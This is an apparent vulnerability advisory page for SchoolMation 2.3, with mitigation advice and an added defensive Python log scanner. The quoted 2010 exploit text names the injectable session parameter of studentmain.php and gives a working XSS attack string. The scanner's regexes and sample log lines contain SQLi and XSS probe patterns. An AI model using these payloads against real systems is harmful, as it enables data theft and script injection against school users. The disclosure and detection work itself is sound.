Vendor: SchoolMation
By: Sid3^effects aKa HaRi
CVSS: 8.3 (HIGH)
Type: SQL Injection and XSS
CWE: 89
Product Name: SchoolMation
Affected Version From: 2.3
Affected Version To: 2.3
Patch Exists: Yes
Related CWE: N/A
CPE: a:schoolmation:schoolmation:2.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux,Windows
Year: 2010

SchoolMation Version 2.3 SQLi and XSS Vulnerability

SchoolMation Version 2.3 is vulnerable to SQL injection and cross-site scripting (XSS); the advisory below places both in the session parameter of studentmain.php. Through the SQL injection an attacker can read the database and modify or delete its data; through the XSS an attacker can inject script into pages served to other users, which can be used to steal their credentials or other sensitive information.

Mitigation:

The vendor has released a patch that addresses the vulnerability. Independently of the patch, input used in SQL queries should be validated and passed as query parameters rather than concatenated into the statement, and values reflected back into HTML should be output-encoded so that the XSS vector is closed as well.

Exploit-DB raw data:

        ====================================================
         SchoolMation Version 2.3 SQLi and XSS Vulnerability
        ====================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1               ##########################################             1
0               I'm Sid3^effects member from Inj3ct0r Team             1
1               ##########################################             0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Name :  SchoolMation Version 2.3 SQLi and XSS Vulnerability
Date : June 9, 2010
Vendor url : http://www.schoolmation.com/
Platform: Linux,Windows
Price: AUD$450
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,gunslinger_
greetz to :All ICW members.

###############################################################################################################
Description:


# Ability for manager to configure dates for terms.

# Quick date search system added by clicking on the term you want to search within.

# Configurable search levels for the teacher section, i.e. restrict searches to either only students, students and teachers, or students, teachers and administrators.

# Greatly enhanced Student section. Standardized tests, Activities, Awards, Grades and Attendance added to the area.

# Searching grades now averages the percentage results. - you can use this to find average marks of students during a term.

# Graphs now work using the date search information

# Financial system added that has the ability to compute total amount paid and owed by a search group. The financial system also has the ability to print pdf invoices.
###############################################################################################################

Xploit: SQLi Vulnerability

DEMO URL : http://server/schoolmv2/html/studentmain.php?session=[sqli]

###############################################################################################################
Xploit: XSS Vulnerability

  Attack Pattern: '"--><script>alert(0x000872)</script>

  http://server/demo/schoolmv2/html/studentmain.php?session=[XSS]


###############################################################################################################
# 0day no more 
# Sid3^effects
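As a defender-side addition that is not part of the advisory or of SchoolMation, the Python below scans web-server access-log lines for requests to the studentmain.php endpoint whose session parameter carries SQL-injection or XSS payloads such as the attack pattern quoted above. The combined log format, the /schoolmv2 install prefix and the sample log lines are assumptions constructed for the example.

```python
"""Flag SQLi/XSS probes against SchoolMation's `session` parameter in
access logs (added example; the sample log lines below are constructed)."""
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit
# Endpoint from the advisory; the /schoolmv2 prefix is assumed from its DEMO URL.
TARGET_PATH = "/schoolmv2/html/studentmain.php"
# SQLi indicators: quote/comment probes and common keywords.
SQLI_RE = re.compile(r"""['"]|--|/\*|\bunion\b|\bselect\b|\bor\s+\d+=\d+""", re.I)
# XSS indicators, covering the advisory's '"--><script>...</script> pattern.
XSS_RE = re.compile(r"<\s*script|javascript:|on\w+\s*=|<\s*(?:img|svg)\b", re.I)
# Apache/nginx "combined" log format (assumed).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) '
                    r'(?P<url>\S+) \S+" (?P<status>\d{3}) \S+')

def classify_session(value):
    """Return the set of tags ('sqli', 'xss') matching a decoded value."""
    tags = set()
    if SQLI_RE.search(value):
        tags.add("sqli")
    if XSS_RE.search(value):
        tags.add("xss")
    return tags

def scan_log(lines):
    """Yield (ip, timestamp, decoded_session, tags) for suspicious requests."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        parts = urlsplit(m["url"])
        if parts.path != TARGET_PATH:
            continue
        # parse_qs decodes one layer; unquote_plus again catches double encoding.
        for raw in parse_qs(parts.query, keep_blank_values=True).get("session", []):
            decoded = unquote_plus(raw)
            tags = classify_session(decoded)
            if tags:
                yield (m["ip"], m["ts"], decoded, tags)

# Constructed samples: normal request, quote probe, the advisory's XSS pattern,
# a double-encoded probe, and a probe against an unrelated path (not flagged).
SAMPLE_LOG = [
    '10.0.0.5 - - [09/Jun/2010:12:00:01 +0000] "GET /schoolmv2/html/studentmain.php?session=4711 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [09/Jun/2010:12:00:07 +0000] "GET /schoolmv2/html/studentmain.php?session=4711%27 HTTP/1.1" 500 312',
    '10.0.0.9 - - [09/Jun/2010:12:00:13 +0000] "GET /schoolmv2/html/studentmain.php?session=%27%22--%3E%3Cscript%3Ealert(0x000872)%3C/script%3E HTTP/1.1" 200 5200',
    '10.0.0.9 - - [09/Jun/2010:12:00:19 +0000] "GET /schoolmv2/html/studentmain.php?session=%2527 HTTP/1.1" 500 312',
    '10.0.0.5 - - [09/Jun/2010:12:00:25 +0000] "GET /schoolmv2/html/index.php?session=%27 HTTP/1.1" 200 880',
]
if __name__ == "__main__":
    print(*scan_log(SAMPLE_LOG), sep="\n")
```

Feed real log lines to scan_log and the heuristics flag the same quote, comment and script-tag probes the advisory describes; expect occasional false positives from benign values that happen to contain an apostrophe.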